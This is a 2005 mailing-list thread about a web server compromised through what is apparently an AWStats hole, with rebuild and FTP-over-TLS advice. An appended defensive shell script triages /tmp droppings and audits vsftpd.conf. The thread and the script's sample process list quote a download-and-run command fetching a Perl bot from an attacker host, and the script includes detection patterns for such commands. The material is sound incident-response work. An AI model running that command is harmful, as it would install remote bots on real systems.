Server compromised
dan
info at hostinthebox.net
Sat Feb 19 00:24:54 UTC 2005
paul at topguncomputers.com wrote:
>>On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul at topguncomputers.com
>><paul at topguncomputers.com> wrote:
>>
>>>Apparently someone has hacked into my webserver and is installing Perl
>>>scripts into the /tmp/ directory. They're usually named .linuxday* or
>>>.cinta* and a few other names as well.
>>>
>>>From what I can tell, something is causing Apache to run a command like
>>>"sh wget bot.linuxday.com.br -O {the above-mentioned files are then
>>>listed}"
>>>
>>>sometimes the site is worm.linuxday.com.br
>>>
>>>I'm curious if anyone has heard about this before. I'm currently
>>>running Fedora 1 with all the latest security patches.
>>
>>The only way to ensure your system is clean, and likely to remain clean,
>>is to:
>>
>>1. Do a bare metal install
>>2. Change all passwords to new strong passwords
>>3. Disable cleartext services, ftp, telnet, rsh, etc.
>>4. Disable root remote login (use su or sudo)
>>5. Restore your uncompromised data
>>6. etc.
>>I had to do this for a client, and for the next 3 days the intruder tried
>>to get back in.
>>
>>--
>>Leonard Isham, CISSP
>>Ostendo non ostento.
>>
>
>
> In place of FTP, what would you suggest? That is the only cleartext
> password service I allow. So what else can I use in place of that?
>
> And shell access is denied for all accounts, except for 2.
>
> I get the feeling this came in on AWStats, although I'm not 100% positive,
> and I want to find out how it got in first before I just delete and
> start over again.
>
That AWStats hit me a couple of times, which sucked. I had all kinds of
cool movies put on the server by whoever popped it.
But in all seriousness, vsftpd uses TLS/SSL connections, so you can
avoid cleartext passwords altogether. It's working quite nicely for me.
Hope that helps
-dant
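The script below is an added example and is not code from anyone in this thread. It does the two practical things the thread discusses in a form you can run offline: triage the symptoms paul reports (hidden Perl scripts dropped in /tmp, and the web-server account spawning sh/wget/perl) and check a vsftpd.conf for the TLS directives that dan's suggestion relies on. Every input is a constructed sample, labelled as such in the code. The web-server account names (apache on Fedora 1, nobody and www-data on other builds), the directory /etc/vsftpd/ and the assumption of vsftpd 2.0 or later, where TLS support first appeared, are mine, not the thread's.

```shell
#!/bin/sh
# Added example (not from the thread): offline triage for the symptoms paul
# describes, plus a check of the vsftpd.conf settings dan's advice needs.
# Every input is a constructed sample; nothing here reads the live /tmp or ps.

# Constructed sample standing in for /tmp on the hacked box.
make_sample_tmp() {
    d=$(mktemp -d)
    printf '#!/usr/bin/perl\n# irc bot\n' > "$d/.linuxday.pl"  # named like the thread
    printf '#!/usr/bin/perl\n'            > "$d/.cinta"        # named like the thread
    printf '#!/usr/bin/perl -w\n'         > "$d/.x"            # renamed; shebang gives it away
    printf 'MIT-MAGIC-COOKIE-1 junk\n'    > "$d/.Xauth"        # hidden, but not a script
    printf '%s\n' "$d"
}

# Constructed sample in the shape of `ps -eo user,pid,args` output.
SAMPLE_PS='USER       PID COMMAND
root         1 init [3]
apache    2211 /usr/sbin/httpd
apache    2390 sh -c cd /tmp; wget bot.linuxday.com.br/bot.txt -O .linuxday.pl; perl .linuxday.pl
apache    2391 wget bot.linuxday.com.br/bot.txt -O .linuxday.pl
nobody    2450 perl /tmp/.cinta
paul      2500 -bash'

# Hidden regular files in DIR that are either named like the thread's
# droppings or start with a Perl shebang (renaming the file is easy;
# hiding the interpreter line is not). Prints one path per line.
find_dropped_files() {
    for f in "$1"/.[!.]*; do
        [ -f "$f" ] || continue
        case "${f##*/}" in
            .linuxday*|.cinta*) printf '%s\n' "$f"; continue ;;
        esac
        if head -n 1 "$f" | grep -q '^#!.*perl'; then
            printf '%s\n' "$f"
        fi
    done
    return 0
}

# Processes owned by the web-server account (assumed: apache on Fedora 1,
# nobody or www-data elsewhere) that run a downloader, a shell or an
# interpreter. httpd should serve pages, not fetch and execute scripts.
# Reads `ps -eo user,pid,args` style text on stdin, prints matching lines.
find_suspect_procs() {
    awk 'NR > 1 && ($1 == "apache" || $1 == "nobody" || $1 == "www-data") {
             cmd = $3; for (i = 4; i <= NF; i++) cmd = cmd " " $i
             if (cmd ~ /(^|[ ;])(wget|curl|perl|sh -c)/) print
         }'
}

# Directives vsftpd.conf needs before logins and data stop crossing the wire
# in the clear (assumes vsftpd 2.0 or later, where TLS support appeared).
# Prints each directive that is missing or not set to the required value.
audit_vsftpd_conf() {
    for want in ssl_enable=YES force_local_logins_ssl=YES force_local_data_ssl=YES; do
        if ! grep -q "^${want}[[:space:]]*\$" "$1"; then
            printf 'missing or weak: %s\n' "$want"
        fi
    done
    return 0
}

# Writes a constructed config to a temp file and prints its path.
conf_file() {
    c=$(mktemp)
    printf '%s\n' "$1" > "$c"
    printf '%s\n' "$c"
}

WEAK_VSFTPD_CONF='# constructed sample: stock cleartext FTP
anonymous_enable=NO
local_enable=YES
write_enable=YES
ssl_enable=NO'

HARDENED_VSFTPD_CONF='# constructed sample: TLS required for logins and data
anonymous_enable=NO
local_enable=YES
write_enable=YES
ssl_enable=YES
force_local_logins_ssl=YES
force_local_data_ssl=YES
rsa_cert_file=/etc/vsftpd/vsftpd.pem'

# Demo over the constructed samples.
sample_tmp=$(make_sample_tmp)
echo "== hidden scripts in $sample_tmp =="
find_dropped_files "$sample_tmp"
echo "== web-server account fetching or running code =="
printf '%s\n' "$SAMPLE_PS" | find_suspect_procs
echo "== weak vsftpd.conf =="
audit_vsftpd_conf "$(conf_file "$WEAK_VSFTPD_CONF")"
echo "== hardened vsftpd.conf (no output means it passes) =="
audit_vsftpd_conf "$(conf_file "$HARDENED_VSFTPD_CONF")"
rm -rf "$sample_tmp"
```

On a real box you would point find_dropped_files at /tmp, pipe `ps -eo user,pid,args` into find_suspect_procs, and run audit_vsftpd_conf against /etc/vsftpd/vsftpd.conf (the path Fedora's vsftpd package uses, assumed here). Two caveats a practitioner would want: a clean audit only means the FTP daemon will refuse cleartext logins, it says nothing about whether the box is still owned; and once an intruder has had root, the process listing and the filesystem can both be lied to, so treat these checks as triage to find the entry point before the rebuild Leonard describes, not as a substitute for it.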